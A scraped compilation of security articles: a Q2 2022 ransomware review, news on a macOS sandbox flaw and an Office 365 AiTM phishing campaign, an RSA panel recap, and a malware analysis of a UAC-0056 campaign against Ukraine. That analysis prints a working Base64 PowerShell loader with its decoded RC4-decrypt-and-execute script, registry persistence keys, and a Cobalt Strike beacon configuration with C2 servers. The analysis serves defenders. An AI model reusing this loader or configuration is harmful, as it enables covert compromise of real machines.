2022 is shaping up to be another banner year for ransomware, which continued to dominate the threat landscape in Q2. 
The post Ransomware rolled through business defenses in Q2 2022 appeared first on Malwarebytes Labs.

Ransomware has given security professionals a headache for the better part of a decade. Fast forward to 2022, and the headache has become a migraine—not just for IT teams but business owners, employees, and customers as well. Over the last three months, ransomware gangs have increased the pressure by multiplying in number and unleashing targeted attacks on vulnerable industries, with disruptions to business operations, million-dollar ransom demands, data exfiltration, and extortion.

The supply chain, already stretched to a breaking point, suffered additional misfortunes across multiple industries, from agriculture and manufacturing to technology and utilities. Governments, nonprofits, and schools—some forced to close their doors—didn’t escape unscathed. And the carnage was not confined to US borders, though it was by far the most affected country. Germany, the UK, and Italy also registered high ransomware tallies.

To understand how we got here, let’s first take a closer look at recent statistics on the top ransomware variants, countries and industries attacked. Next, we’ll evaluate noteworthy attacks month-by-month before discussing whether it’s worth paying the ransom in today’s climate. In addition, we’ll examine current trends to deduce what businesses might expect from ransomware authors in the months to come. Finally, we’ll review mitigation tactics that businesses of all sizes can adopt to keep ransomware at bay.

****Top ransomware variants****

LockBit was the most widely-distributed ransomware in March, April, and May 2022, and its total of 263 spring attacks was more than double the number of Conti, the variant in second place. However, the Conti gang suffered severe setbacks in the wake of its public declaration of support for Russia and subsequent data leaks of its source code, and the group quietly dismantled operations while keeping up appearances. Three groups alleged to be linked to Conti’s disbandment—Black Basta, ALPHV, and Hive—eventually overtook Conti in ransomware distribution by the end of May.

Here’s how the top variants ranked by total number of spring incidents:

1.  LockBit: 263
2.  Conti: 127
3.  Black Cat/ALPHV: 68
4.  Hive: 40
5.  Black Basta: 33\*

\*Black Basta launched in April, so its tally is one month less than the others.

****Top countries****

The United States was by far the most attacked country this spring, with 290 reported ransomware events. Its cyberattack count far surpassed the next two highest countries (Germany and the UK) combined, with the former reporting 48 ransomware incidents and the latter 41.

Here are the top five countries impacted by ransomware this spring:

1.  United States: 290
2.  Germany: 48
3.  UK: 41
4.  Italy: 38
5.  Canada: 31

****Top industries****

Perhaps it might be easier to create a list of industries that weren’t impacted by ransomware in Q2. Services—a catch-all term encompassing service-providing sectors such as transportation, travel, finance, health, education, information, government, and a myriad of other industries—was targeted the most by cybercriminals. However, in a clear bid for the supply chain jugular, threat actors also zeroed in on manufacturing, technology, utilities (including oil), and agriculture.

In fact, the FBI warned the food and agriculture sector (specifically farmers’ co-ops) this April about potential ransomware attacks during critical planting and harvesting seasons that could result in operational disruptions to the supply chain, which could then lead to food shortages. The previous month, HP Hood Dairy suffered a ransomware attack, which was likely behind its Lactaid brand going missing from shelves in early April.

Here’s how the top five industries ranked by number of ransomware attacks this spring:

1.  Services: 171
2.  Manufacturing: 76
3.  Technology: 65
4.  Utilities: 61
5.  Retail: 50

****Noteworthy March attacks****

March was a chaotic month featuring headline-grabbing attacks on tech giants Microsoft and Samsung, as well as automotive titan Toyota, which was forced to halt production across its Japanese plants after a key supplier was compromised. Lapsus$, the criminal enterprise behind Samsung’s infiltration, leaked 190 GB of data and source code reportedly from the Galaxy smart phone, as well as confidential information from Qualcomm.

The most active ransomware variant was LockBit, which registered 97 attacks in March alone, including a hit on tire company Bridgestone Americas that caused the organization to disconnect many of its Latin and North American manufacturing and retreading facilities from the corporate network.

Hive ransomware, a RaaS launched in June 2021, was also busy in March. The group attacked Romania’s petroleum provider, demanding a multi-million dollar ransom and forcing the company to shut down its websites and Fill&Go services at gas stations. Hive also compromised a California healthcare nonprofit later in the month.

****Noteworthy April attacks****

April stood out as the month when three new dangerous RaaS variants, thought to be Conti-affiliated were introduced: Onyx, Mindware, and Black Basta. Conti still had some bite left, however, with 43 reported attacks that month. Among them were industrial giant Parker Hannifin and American automotive tools manufacturer Snap-on, as well as Panasonic’s Canadian operations, from which Conti claimed to have stolen 2.8 GB of data.

Newcomer Black Basta, who carried out 11 attacks in April, made headlines when it compromised German wind turbine company Deutsche Windtechnik and the American Dental Association, which was forced to take affected systems offline. The organization suffered disruptions to online services, telephones, email, and webchat, as well as personal data leaked on its members.

Onyx ransomware, meanwhile, launched with only six attacks in April, but they were deadly. The malware doesn’t just lock up systems and data—it destroys any file larger than 2 MB. Mindware also made a splashy April debut with double extortion threats and 13 attacks, including a Minnesota-based mental health provider from which it pilfered sensitive patient information.

The award for most data stolen in April goes to the Stormous criminal gang, who bragged about an assault resulting in 161 GBs exfiltrated from Coca-Cola without the company knowing. Reports say the Russian-linked threat actors later put it up for sale for 16 million Bitcoin or $640,000.

To add insult to injury, REvil (aka Sodonokibi) appeared to return in April with new payloads and a fresh leak blog featuring a mixture of recent and old victims. The threat actors have been linked to numerous high-profile ransomware incidents, including arguably the biggest ransomware attack of all time—a supply-chain hit on Kaseya in July 2021 believed to have affected over 1,000 businesses.

****Noteworthy May attacks****

In May, government and education were some of the hardest hit verticals, while attacks on Indian airline SpiceJet and farming equipment maker AGCO made the most headlines globally. Black Basta was reportedly behind the AGCO infiltration, which disrupted production of harvesters, tractors, and other business operations. The Austrian state of Carinthia also made the news when the BlackCat gang disrupted their systems and demanded a ransom of $5 million.

Despite strong evidence of a slow-down in activity—just 12 reported incidents in May—Conti made a showy display with a massive, sustained attack against Costa Rica that resulted in its new president declaring a state of emergency on May 8. On the same day, an inflammatory message appeared on the group’s leak site alongside 672 GB of stolen data. In response, the US Department of State offered a $10 million reward for information leading to individuals holding key leadership positions within Conti.

In other May government attacks, the town of Quincy, Massachusetts, had its information service systems compromised. They paid $500,000 for a decryption key and an additional $150,000 for security consultants to assist with the investigation. A ransomware attack in New Jersey’s Somerset County disrupted services and forced employees to shut down computers and create temporary Gmail accounts to ensure the public could still email key departments. The attack marked the 22nd US state or local government to be hit by ransomware in 2022, according to analysts at Recorded Future.

In education, several colleges and K–12 districts were crippled by ransomware. Kellogg Community College in Michigan was forced to cancel classes and close campuses due to a ransomware attack. On May 13, Lincoln College in Illinois permanently closed its doors after 157 years due to the combined effects of the pandemic and a major ransomware incident—a first in ransomware history.

Not to be outdone, LockBit set a steady pace in May with 73 attacks. Thought to have strong ties with Russia, the cybercriminals compromised the Bulgarian Refugee Agency and threatened to release sensitive files. Nearly 230,000 Ukrainian refugees have entered Bulgaria since the start of the war. LockBit was also behind May strikes against electronics manufacturer Foxcomm, the Rio de Janeiro finance department, and one of the largest library services in Germany.

****New ransomware trends****

In recent months, cybercriminals have upped the ransomware ante with further developments in functionality, sophistication, and distribution techniques. As a combined result of the increase in big game hunting (BGH) and remote/hybrid work, threat actors have been encountering ever more complex security infrastructures and a wider variety of devices and platforms.

To penetrate and encrypt as many systems as possible, some threat groups have started writing ransomware code using cross-platform programming languages like Python, Rust, or Golang. This allows the malware to run on different combinations of operating systems and architectures. Both BlackCat and Conti affiliates have been observed distributing versions of their variants for Linux as well as Windows. Developing in a cross-platform language also makes analyzing the malware more difficult for security researchers.

In attack methods, ransomware authors—while still favoring good old-fashioned social engineering—have started backing away from phishing emails and leaning toward exploiting server, software, and operating system vulnerabilities instead. In fact, unpatched vulnerabilities are now the primary vector for ransomware attacks, according to a report by IT software company Ivanti.

Last year, Ivanti identified 65 new vulnerabilities known to have been exploited in ransomware attacks—a number representing nearly one quarter of all vulnerabilities used to drop the threat in the history of its existence. There were 39 percent more vulnerabilities used for ransomware attacks in 2021 than in the previous year, and 2022 is shaping up to be even more tumultuous. From January to May 2022, 22 new vulnerabilities associated with ransomware were found, and all but one are considered critical or high-risk.

What do these trends mean for the year ahead? Cross-platform ransomware has the potential to infect even more systems, some (like Linux) that lack robust anti-ransomware protections. Coding ransomware in this way could eventually take down all endpoints, including IoT and personal devices, in a single blow, rendering recovery operations incredibly difficult—if not outright impossible. Automatic data backups to offsite and/or segmented servers will be key in keeping businesses operational in case of breach.

Meanwhile, ransomware operators are moving to swiftly weaponize vulnerabilities. The average time to exploit is now within eight days of the vulnerability being published by a vendor. That means organizations will need to prioritize patching vulnerabilities associated with ransomware, as well as according to criticality and against their own risk appetites.

****To pay or not to pay****

As ransomware attacks have evolved in sophistication and impact, so too have their ransom demands. Ransoms were 36 percent higher in 2021 than in 2020 at an average of $6.1 million. Yet by spring of 2022, many ransomware authors had whittled away at any sense of trust businesses might have had that by paying the ransom, they’ll receive what’s promised.

In 2020, gangs such as Conti, REvil, and Maze published stolen data even if the ransom was paid. Others took the ransom and never returned the files. By 2021, only 8 percent of those who paid the ransom actually got their files back. At that point, 83 percent of successful attacks featured double or triple extortion schemes. According to a Proofpoint study, 60 percent of participants who opted to negotiate with their attackers ended up having to pay ransom more than once.

By spring 2022, ransomware gangs showed no sense of responsibility toward their victims. RaaS operations, which now dominate the ransomware landscape, tend to be short-lived (therefore reputation isn’t important), and renegade affiliates often fail to follow their operator’s directions. When ransom demands bust the budget, data is not returned or is leaked regardless, and paying up puts a target on your back, it’s probably best to pocket the millions and get to work on mitigations.

****Ransomware mitigations****

To stave off potential future attacks—especially in an era of political and economical instability—the following actions are recommended:

*   Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Make sure these copies are not accessible for modification or deletion from any system where the original data lives.
*   Administer network segmentation so that all machines on your network are not accessible from every other machine.
*   Install updates/patches to operating systems, software and firmware as soon as they are released.
*   Install and regularly update endpoint security software on all devices—including those used in work-from-home capacities—and enable real-time detection.
*   Audit user accounts with administrative privileges and configure access controls with the least privilege in mind. Implement multifactor authentication (MFA) for additional credential security.
*   Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor for any unusual activity.

For ransomware reviews by the Malwarebytes Threat Intel team, check out the following:

*   March ransomware review
*   April ransomware review
*   May ransomware review
*   June ransomware review

Be ready and resilient in advance of ransomware attacks. Learn more.

_Malwarebytes’ CEO Marcin Kleczynski started the Byte into Security newsletter to provide readers with candid takeaways—and practical solutions—for the most pressing security topics of the day._ _Subscribe to get the CEO perspective sent straight to your inbox_!

Ransomware rolled through business defenses in Q2 2022

Microsoft reveals now-fixed flaw in Apple's App Sandbox controls could allow attackers to escalate device privileges and deploy malware.

Microsoft has revealed a now-fixed flaw in Apple's macOS that allowed specific kinds of code to bypass the operating system's App Sandbox restrictions on third-party applications, potentially allowing attackers to escalate device privileges and install additional malicious payloads.

Microsoft shares credit for the find (CVE-2022-26706) with researcher Arsenii Kostromin, the company said in its announcement, adding that Apple patched the vulnerability in its May 16 security update.

The team at Microsoft discovered the bug while researching malicious macros in Microsoft Office for macOS, they explained in a recent blog post.

"Our research shows that even the built-in, baseline security features in macOS could still be bypassed, potentially compromising system and user data," the team wrote. "Therefore, collaboration between vulnerability researchers, software vendors, and the larger security community remains crucial to helping secure the overall user experience. This includes responsibly disclosing vulnerabilities to vendors."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

MacOS Bug Could Let Malicious Code Break Out of Application Sandbox

While the war in Ukraine still rages, various threat actors continue to launch cyber attacks against its government entities. In this blog we review the latest campaign from the UAC-0056 threat group.
The post Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign appeared first on Malwarebytes Labs.

_This blog was authored by Roberto Santos and Hossein Jazi_

The Malwarebytes Threat Intelligence team recently reviewed a series of cyber attacks against Ukraine that we attribute with high confidence to UAC-0056 (AKA UNC2589, TA471). This threat group has repeatedly targeted the government entities in Ukraine via phishing campaigns following the same common tactics, techniques and procedures (TTPs).

Lures are based on important matters related to the ongoing war and humanitarian disaster happening in Ukraine. We have been closely monitoring this threat actor and noticed changes in their macro-based documents as well as their final payloads.

In this blog, we will connect the dots between different decoy samples that we and others such as Ukraine CERT have observed. We will also share indicators for a previously undocumented campaign performed by the same threat actor at the end of June.

**Different themes, same techniques**

Since the publication of our blog post _There’s a Go Elephant in the room_, we have tracked several new samples as can be seen in the timeline below:

Figure 1: Relations between different UAC-0056 attributed samples

Let’s dig further into those relationships. UA-CERT has attributed the document named “_Information on the availability of **vacancies** and their staffing.xls_” to UAC-0056. This file looked familiar to us and for good reason because the macro is nearly identical to the document we analyzed in our initial blog:

Figure 2: Detail of Vacancies and GoElephant dropper macros

In the most recent attack reported by UA-CERT (_**Humanitarian catastrophe** of Ukraine since February 24, 2022.xls_) we see an almost identical macro to the one used in another decoy document called _Help Ukraine.xls_:

Figure 3: Detail of Help Ukraine and Humanitarian catastrophe macros

The **Help Ukraine** lure, to our knowledge, has never been publicly documented before:

Figure 4: Help Ukraine lure used in late July

We were able to identify 7 different samples with that theme, including one (258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0) that has some similarities with a previous attack:

Figure 5: Similarities between different versions

Also, in the past we have found comments regarding to a domain named ExcelVBA\[.\]ru. This document was contacting a suspiciously similar domain named excel-vba\[.\]ru.

Figure 6: Similarities between different versions (2)

Among victims, we find gov.ua emails being targeted. One of the texts used as email body in the last campaign was written in Ukrainian and translates to:

> _On February 24, 2022, the army of the terrorist state – the Russian Federation, intervened on the territory of Ukraine. In order to counter the propaganda of the Russian government, the State Department of Statistics at the Office of the President of Ukraine prepared a consolidated report on the dead citizens of Ukraine, on the citizens of Ukraine who were left without a home, on the citizens of Ukraine who lost their jobs, on the number of destroyed homes, on the number of destroyed businesses as a result of an act of aggression . This report shows all the data broken down by regions of Ukraine. Familiarize yourself and familiarize your colleagues with the real state of affairs. Glory to Ukraine_!
> 
> Translation of original email sent to victims

We will focus our analysis on these 3 newer templates. Exact names and paths are from 024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1 (_Information on the availability of vacancies and their staffing.xls_). The analysis is still valid for the others, while minor changes exist between samples.

**write.bin**

The document will download an executable file named _write.bin_. Other attacks following the same scheme used different names for this file, including _Office.exe_, _baseupd.exe_ and _DataSource.exe_. The file is slightly obfuscated, and performs the following actions:

**Establishing persistence**

After some antidebug tricks, the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Check License is used to establish persistence. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Update Checker, is checked first because that was the key used by previous versions of the malware.

Figure 7: Run key for persistence

**Dropping next stage**

Next step is dropping a file in _C:\\ProgramData\\TRYxaEbX_.  This file will be used later.

Figure 8: Powershell commandline shown in IDA Pro

The payload will execute the following powershell Base64 encoded command:

JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIAWAAiACkAOwAKACQAQgAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACIAQwBtAEEASgBuAGcAdgBkAEQAbQBpAFQAagBMAHgATgAiACkAOwAKACQAQQA9AHsAJABXACwAJABZAD0AJABBAHIAZwBzADsAJABYAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAFoAPQAoACQAWgArACQAWABbACQAXwBdACsAJABZAFsAJABfACUAJABZAC4ATABlAG4AZwB0AGgAXQApACUAMgA1ADYAOwAkAFgAWwAkAF8AXQAsACQAWABbACQAWgBdAD0AJABYAFsAJABaAF0ALAAkAFgAWwAkAF8AXQB9ADsAJABXAHwAJQB7ACQAVQA9ACgAJABVACsAMQApACUAMgA1ADYAOwAkAFYAPQAoACQAVgArACQAWABbACQAVQBdACkAJQAyADUANgA7ACQAWABbACQAVQBdACwAJABYAFsAJABWAF0APQAkAFgAWwAkAFYAXQAsACQAWABbACQAVQBdADsAJABfAC0AYgB4AG8AcgAkAFgAWwAoACQAWABbACQAVQBdACsAJABYAFsAJABWAF0AKQAlADIANQA2AF0AfQB9ADsACgAkAEMAIAA9ACAAKAAmACAAJABBACAAJABBADEAIAAkAEIAMQApADsACgAkAEUAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAEMALAAwACwAJABDAC4ATABlAG4AZwB0AGgAKQA7AAoAJABFACAAPQAgACQARQAgAC0AUwBwAGwAaQB0ACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATgBlAHcATABpAG4AZQA7AAoAZgBvAHIAZQBhAGMAaAAoACQARQBFACAAaQBuACAAJABFACkAewBpAGUAeAAgACQAKAAkAEUARQArACIAOwAiACkAOwB9ADsA

Figure 9: Write executable creating the previous detailed powershell command

The chunk before is Base64 encoded; which decodes to:

$A1 = [System.IO.File]::ReadAllBytes("C:\ProgramData\TRYxaEbX");

$A={$W,$Y=$Args;$X=0..255;0..255|%{$Z=($Z+$X[$_]+$Y[$_%$Y.Length])%256;$X[$_],$X[$Z]=$X[$Z],$X[$_]};$W|%{$U=($U+1)%256;$V=($V+$X[$U])%256;$X[$U],$X[$V]=$X[$V],$X[$U];$_-bxor$X[($X[$U]+$X[$V])%256]}};

$C = (& $A $A1 $B1);

$E = (New-Object -TypeName System.Text.UTF8Encoding).GetString($C,0,$C.Length);

$E = $E -Split [Environment]::NewLine;

foreach($EE in $E){iex $($EE+";");};

In short the file dropped in _C:\ProgramData\TRYxaEbX_ will be decrypted using CmAJngvdDmiTjLxN as key using the RC4 algorithm. This next PowerShell script will look like:

Figure 10: Decoded PowerShell stage

Here we can see some of the actions that will be taken:

*   Disable script logging
*   Disable Module Logging
*   Disable Transcription
*   Disable AMSI protection

After this step, another Base64 payload is decoded and executed:

Figure 11: Final PowerShell script

**Cobalt Strike payload deployed**

As it can be seen, the main functionality provided by this second PowerShell file is to inject shellcode. This shellcode can be 32 or 64 bit, and is a Cobalt Strike beacon with the following configuration:

**BeaconType**                    – HTTPS

**Port**                              – 443

**SleepTime**                       – 30000

**PublicKey\_MD5**              – defb5d95ce99e1ebbf421a1a38d9cb64

**C2Server**                         – skreatortemp.site,/s/08u1XdxChhMrLYdTasfnOMQpbsLkpq3o/field-keywords/

**UserAgent**                       – Mozilla/5.0\_Frsg\_stredf\_o21\_rutyyyrui\_type (Windows NT 10.0; Win64; x64; Trident/7.0; D-M1-200309AC;D-M1-MSSP1; rv:11.0) like Gecko\_10984gap

**HttpPostUri**                    – /nBz07hg5l3C9wuWVCGV-5xHHu1amjf76F2A8i/avp/amznussraps/

**Watermark**                      – 1580103824

By having a Cobalt Strike instance running on the victim’s machine, it is now fully compromised.

**Attacker probes the sandbox**

At the time of writing, malicious C&C servers seem to be down. However, on July 5 we saw active servers and successful connections to our test environment. The attackers actively sent reconnaissance commands to the machine, listing the content of several folders.

We were able to decode the network communications using Didier Steven’s excellent collection of Cobalt Strike tools.

Figure 12: Cobalt Strike communication decoded

We consider these actions preliminary moves to check whether the machine is a viable target or not before following up with other actions.

**Attribution to UAC-0056**

Based on recent attacks reported by CERT UA, as well as the similarities indicated at the beginning of the blog, we can attribute this attack with high confidence to UAC-0056.

Signatures contained in the Cobalt Strike beacons (watermark 1580103824 and public key defb5d95ce99e1ebbf421a1a38d9cb64), may be used to connect the attack to other groups. For instance, the public key should be unique among deployments, according to the CobaltStrike documentation.

However, it is important to note that in that case we cannot simply rely on a public key to attribute the sample we analyzed in this report. In fact, these signatures have been attributed to many different groups. Our assessment is that the group used a leaked version of Cobalt Strike and used the same private key as others, making attribution harder.

Malwarebytes users were protected against this campaign thanks to our Anti-Exploit layer.

**IOCs**

**Malicious Excel documents (Help Ukraine template)**

fe3bc87b433e51e0713d80e379a61916ceb6007648b0fde1c44491ba44dc1cb3  
c9675483ab362bc656a9f682928b6a0c3ff60a274ade3ceabac332069480605a  
1b95186ecc081911c3a80f278e4ed34ee9ef3a46f5cf1ae8573ac3a4c69df532  
258a9665af7120d0d80766c119e48a4035ee3b68676076bf3ed6462c644fe7d0  
e663bb4d9506e7c09bcf7b764d31b61d8f7dbae0b64dd4ef4e9d282e1909d386  
ecd2bb648a9ad28069c1ec4c0da546507797fdf0243e9e5eece581bf702675ff  
eac9a4d9b63a0ca68194eae433d6b2e9a4531b60b82faf218b8dd4b69cec09df

**Malicious Excel documents (Humanitarian template)**

024054ff04e0fd75a4765dd705067a6b336caa751f0a804fefce787382ac45c1  
14736be09a7652d206cd6ab35375116ec4fad499bb1b47567e4fd56dcfcd22ea  
474a0f0bb5b17a1bb024e08a0bb46277ba03392ee95766870c981658c4c2300d

**Payloads**

0709a8f18c8436deea0b57deab55afbcea17657cb0186cbf0f6fcbb551661470  
aadd8c7c248915c5da49c976f24aeb98ccc426fb31d1d6913519694a7bb9351a  
fb2a9dcfcf41c493fb7348ff867bb3cad9962a04c9dfd5b1afa115f7ff737346  
501d4741a0aa8784e9feeb9f960f259c09cbceccb206f355209c851b7f094eff

**Cobalt Strike beacon and payloads**

136.144.41\[.\]177  
syriahr\[.\]eu/s/Xnk75JwUcIebkrmENtufIiiKEmoqBN/field-keywords/  
syriahr\[.\]eu/nzXlLVas-VALvDh9lopkC/avp/amznussraps/  
skreatortemp\[.\]site  
imolaoggi\[.\]eu

Cobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign

The massive phishing campaign does not exploit a vulnerability in MFA. Instead, it spoofs an Office 365 authentication page to steal credentials.

Microsoft recently discovered a widespread phishing attack campaign targeting Office 365 users that lures victims to a phony Office authentication page where it pilfers their credentials and later executes a second wave of attack, business email compromise (BEC), using intel gathered from their email accounts.

The attackers behind the campaign have targeted more than 10,000 organizations since September 2021, according to Microsoft, and employ the Evilginx2 phishing kit as the infrastructure for hijacking the authentication process. "We also uncovered similarities in their post-breach activities, including sensitive data enumeration in the target’s mailbox and payment frauds," according to a post by the Microsoft 365 Defender Research Team that details the attacks.

The man-in-the-middle attack — or, as Microsoft now calls it, adversary-in-the-middle (AiTM) — sets up a proxy server that sits between the victim and the actual authentication page. "Such a setup allows the attacker to steal and intercept the target's password and the session cookie that proves their ongoing and authenticated session with the website. Note that this is not a vulnerability in MFA; since AiTM phishing steals the session cookie, the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses," Microsoft said in its post.

Organizations should up their MFA game with conditional access policies, which vet sign-in requests based on identity, IP location, and device status, for example, according to Microsoft.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft: 10,000 Orgs Targeted in Phishing Attack That Bypasses Multifactor Authentication

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs …
  All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity Read More »

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs of steel ropes.

We noted that a single steel rope could not withstand such an enormous weight. But when hundreds work together in unison, their combined strengths are sufficient to support the monumental load of the bridge and its occupants, with capacity to absorb fluctuations in traffic volumes and high stress events like windstorms and earthquakes.

Like the steel ropes of the Golden Gate Bridge, we in the cybersecurity community cannot carry the load alone, but together “with all hands-on deck”, we can address even the largest challenges.

That afternoon at the RSA Conference 2022, I had the pleasure of moderating a panel with Microsoft’s Aanchal Gupta (@nchlgpt), Intel’s Tom Garrison (@tommgarrison) and the NSA’s (@NSAGov) Dr. Diane Janosek (@dm\_janosek) where we discussed how to overcome a culture of secrecy to create transparent and trusted cross-organization collaboration, and the challenge of encouraging responsible disclosure without the fear of backlash.

In this blog I will summarize the topics discussed by each of the panelists, starting with the **threats that are driving the need for greater collaboration.**

At the beginning of the discussion, Aanchal highlighted that **Software Supply Chain** attacks are both one of the industry’s biggest risks and therefore priorities to address saying “even though this is not a new risk, our reliance on third party and open-source software is exponentially increasing, and it is only a matter of time before we see more supply chain issues. Log4j and Nobelium are just the tip of the iceberg.”

Aanchal then explained that there are two primary reasons why supply chain attacks will continue to rise. “First, as our dependence on third party software is growing, it is becoming more attractive for threat actors to find the soft spots. Attackers could easily convince an insider, or they could find an unpatched vulnerability, to inject their malicious payload into the supply chain. What makes it extremely difficult is that certain software is ubiquitous, “like salt in your pantry”. Salt is in almost every snack item in your pantry, and you can imagine if that is contaminated, how difficult it will be to address the issue. Log4j became a challenging issue because of its pervasive use.”

Tom further elaborated on how the supply chain is evolving into a platform with a “digital DNA” and the importance of **System, Traceability** and **Transparency**. “What we want to do is to peel back this sort of _almost_ secrecy that’s existed around what components are used to build your device–whether it’s a PC or a server or an IOT device. These are the foundation of trust and empower customers to make intelligent decisions around their platforms. In order to maintain a healthy system, it is important to ask questions about **Patching**. How do I manage my system overtime? Am I smart about updates and applying them in a timely manner? Do I have a process around updating these machines on a regular basis? This is the very first step towards transparency and is a great healthy step.”

Diane then highlighted the strategic importance of also considering the threats associated with **Adversarial AI**. “While AI has phenomenal machine learning usages, helping make sense of the massive data sets – the entire inference depends upon the integrity of that data for the algorithms to _actually_ work. “If the adversaries are altering that data, recognizing that we’re using certain models for critical security decisions and more, our models will be incorrect”. Understanding the world of human generated attacks vs. the AI based attack surface raises the level of sophistication and complexity that we must get ahead of.”

Next, Aanchal discussed how organizations can foster collaboration to raise the bar for security, starting with the concept of a **Software Bill of Materials (SBOM)**. To get ahead of supply chain risks, it helps to think of your SBOM as a “recipe”.

1.  First, **know what ingredients make up your recipe**. Do you have a list of all the software in your organization? If not, you need to create one.
2.  Next, **understand where your ingredients come from** and what controls are in place to ensure their reliability as they are produced and delivered to you.
3.  And finally, trust but verify. **Test your ingredients regularly to ensure their integrity.**

To mitigate some of this risk, the US Government issued an Executive Order (EO) earlier this year. The EO is the start of the process of the US government identifying the problems and engaging with the private sector to define solutions. This is a multi-year effort that will profoundly change the requirements to sell software to the US government, one of the largest tech buyers on the planet. As we help shape the EO, we will raise the difficulty of attacking the US government, and overall software.  

As the largest provider of enterprise software, we have a responsibility to provide leadership and help – with things like the SBOM – where you call out the dependencies that each piece of software has. We are actively participating in helping shape the underpinnings of the EO. 

Tom then discussed the importance of collaborating with both external AND internal researchers. “To build a deep understanding of the products and HW/SW solutions stacks, this requires partnerships with ethical hackers, and security investments to drive deeper research to ensure that the learnings not only fix legacy and historical problems, but also ensure long-term safety as we shape future products and technologies.”

The panel then moved onto discussing the paradoxical need for transparency and responsible disclosure within a culture of secrecy. This was talked about with great energy and passion, not just by the panelists but also by members of the audience. There is always the tension of how we maintain confidentiality about the vulnerability until all the partners have a mitigation or fix, but also ensure that stakeholders are well informed. This is not just about doing the right thing morally, but it is also good for business to share the information in a timely manner. We are at an inflection point; where this clarity and realization is helping drive intentional collaboration on vulnerability disclosure to patching as a priority and we look forward to making measurable progress here.

The panel agreed that we should not penalize and ostracize people for sharing a breach of their system. We need to shift the culture from blame to community support. When we support organizations to be forthcoming with their experience, we will get better insights and it will also help identify supply chain issues early on. It is due to the fear of retaliation that people don’t share the details. Help them become better vendors and service providers by sharing their knowledge. Their breach is not just their breach anymore; we are all in this together.

Finally, the conversation shifted to working with law enforcement to ensure cyber criminals are held accountable. Diane gave this wonderful example: “Consider critical infrastructure sectors for the United States (e.g., energy sector, transportation sector etc.). 80% are run by the private sector, and 20% by the government. So even if I, as the government, get an A grade for my 20% (which is defense and telecommunications), it’s not good enough for the country if all other sectors fail. We need to establish the fine balance to be able to do the signals intelligence mission and the cyber security mission across government and private sector, to get holistic protection, while protecting the Constitution”. This is a crucial point for a whole-of-society approach; we must continue to partner with all sectors – private and government – to ensure we preserve privacy and security, holistically.

Thinking back to the Golden Gate bridge, the individual steel hangers do not support just the vehicles directly beneath them. Each hanger is critical in supporting the entire bridge and every vehicle travelling on it, no matter where on the bridge a vehicle happens to be. Similarly, for those of us in the cybersecurity industry and our respective customers and products, when we work together, we create a stronger and more resilient foundation for all.

Watch the panel on demand at this link: https://cybersecurityinside.com/video/cybersecurity-rsa-panelists/

Listen to the panel on demand at this link: https://cybersecurityinside.com/episodes/protect-cyber-collaboration-rsa/

Read Tom Garrison’s ‘Supply Chain Security is Evolving into a Platform with “Digital DNA”’ blog at this link: https://buff.ly/3xEYb2A

All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity

Machine learning and automation can help free up security pros for higher-value tasks.

Humans have a well-deserved reputation for being the weakest link in the cybersecurity of any size organization. Whether it's an IT specialist misconfiguring a firewall setting, a DevOps engineer failing to secure a cloud storage bucket, or a hapless business user falling for a phishing scam, the vast majority of cybersecurity breaches are primarily caused by human error creating exploitable vulnerabilities. The result is many avoidable weaknesses being pursued by criminal opportunists enabled by cheap, plentiful cybercrime tools of the trade.

Thankfully, the humans working in the security operations center (SOC), the Tier 1 and Tier 2 analysts on the front line of cyber defense, are the strongest link in cybersecurity operations. They must be kept in the loop, ideally performing higher-value tasks than keeping "eyes on the glass" to review security telemetry.

**Tools for Assisting, Not Replacing, Humans  
**

Looking to technology to help us secure technology is the right approach. The servers, Web applications, endpoints, network devices, and security measures in a company's digital landscape produce massive volumes of security telemetry and alerts that must be monitored and analyzed, but most turn out to be benign.

Identifying the meaningful alerts in high-volume event streams is the perfect job for correlation rules and unsupervised machine learning (ML) algorithms that combine human knowledge and threat intelligence with continuous learning and improvement. Machines can handle the speed and scale required for the initial screening of the high-volume stream of event logs and alerts. Also, algorithms don't get tired or have a lapse in attention, go on vacation, or call in sick.

